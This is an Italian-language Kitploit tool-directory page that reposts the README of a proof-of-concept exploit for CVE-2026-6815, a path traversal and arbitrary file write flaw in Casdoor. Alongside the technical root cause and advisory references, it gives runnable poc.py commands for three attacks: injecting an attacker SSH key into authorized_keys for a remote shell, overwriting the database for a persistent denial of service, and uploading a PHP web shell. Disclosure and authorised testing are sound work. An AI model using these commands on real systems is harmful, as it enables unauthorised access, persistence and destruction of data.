Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-6815 — PoC exploit per path traversal autenticato e scrittura arbitraria di file per Casdoor <3.54.1, che consente RCE tramite iniezione di chiavi SSH, upload di web shell o DoS persistente tramite corruzione del database. | Kitploit
Strumenti/GitHubGitHub/danilo-dellorco/cve-2026-6815
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubdanilo-dellorco/cve-2026-6815

CVE-2026-6815

PoC exploit per path traversal autenticato e scrittura arbitraria di file per Casdoor <3.54.1, che consente RCE tramite iniezione di chiavi SSH, upload di web shell o DoS persistente tramite corruzione del database.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
222 mesi faNon ancora revisionato
Condividi

CVE-2026-6815 PoC/Exploit: Casdoor <3.54.1 Path Traversal e Scrittura Arbitraria di File (Autenticato)

Questo repository contiene un exploit Proof of Concept (PoC) per CVE-2026-6815, una vulnerabilità di scrittura arbitraria di file e path traversal in Casdoor.

La vulnerabilità è stata risolta nella versione 3.54.1.

Requisiti

L'attaccante deve essere autenticato all'istanza Casdoor con privilegi di amministratore o utente equivalente che abbia accesso per creare e/o modificare provider di archiviazione.

Impatto

  • Esecuzione di codice in remoto (RCE): Scrivendo in posizioni sensibili come .ssh/authorized_keys, crontab o webroot.
  • Denial of Service (DoS): Sovrascrivendo database dell'applicazione (casdoor.db) o binari principali con file arbitrari, fermando immediatamente l'applicazione.

Dettagli Tecnici

Casdoor consente agli amministratori di configurare provider di archiviazione. Il provider Local File System non sanifica correttamente la configurazione pathPrefix e il parametro fullFilePath durante il caricamento delle risorse.

Utilizzando sequenze di directory traversal (../), un amministratore autenticato può uscire dalla directory di archiviazione dedicata e scrivere file in qualsiasi punto in cui il processo Casdoor ha i permessi.

La vulnerabilità deriva da una validazione insufficiente del percorso in:

  • object/provider.go: Nessuna validazione su pathPrefix durante creazione/aggiornamento.
  • storage/local_file_system.go: Il metodo GetFullPath non verifica se il percorso risolto rimane all'interno della sandbox prevista.

Utilizzo

  1. Installare le dipendenze:

    root@kitploit:~
    pip install -r requirements.txt
    
  2. Eseguire l'exploit:

    root@kitploit:~
    python3 poc.py --url http://target:8000 --file local_file --rpath /home/casdoor/new_remote_file
    

Esempi di Utilizzo

1. Iniezione di Chiave SSH per RCE

Scrivere una chiave pubblica controllata dall'attaccante nel file authorized_keys dell'utente casdoor per ottenere accesso SSH.

Generare la chiave SSH:

root@kitploit:~
ssh-keygen -f casdoor_rce

Sovrascrivere authorized_keys con la chiave pubblica generata:

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file casdoor_rce.pub --rpath /home/casdoor/.ssh/authorized_keys

Ottenere una shell SSH sull'host remoto usando la chiave privata:

root@kitploit:~
ssh -i ./casdoor_rce casdoor@target

2. DoS Persistente (Corruzione del Database)

Sovrascrivere il file del database locale dell'applicazione (es. casdoor.db) per causare un denial of service.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db

3. Caricamento di Web Shell (Webroot Secondario)

Se il server ospita un server web secondario (es. Apache/Nginx) sullo stesso filesystem, scrivere una web shell nella sua document root.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php

4. Organizzazione e Applicazione Personalizzate

Se si dispone di credenziali amministrative per un'organizzazione e un'applicazione specifiche (diverse da quelle predefinite built-in e app-built-in), specificarle usando --orgname e --appname.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr custom_admin --psw P@ssw0rd --orgname my-org --appname my-app --file local_file.txt --rpath /tmp/pwned.txt

Riferimenti

  • CERT/CC Vulnerability Note VU#937808
  • CVE-2026-6815 on CVE.org
  • Red Hat Security Advisory: CVE-2026-6815

Dichiarazione di non responsabilità

Questo software è solo per scopi educativi e di test di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso improprio di queste informazioni.

Autore

Vulnerabilità scoperta e PoC sviluppato da Danilo Dell'Orco (sixpain).

Scarica lo strumento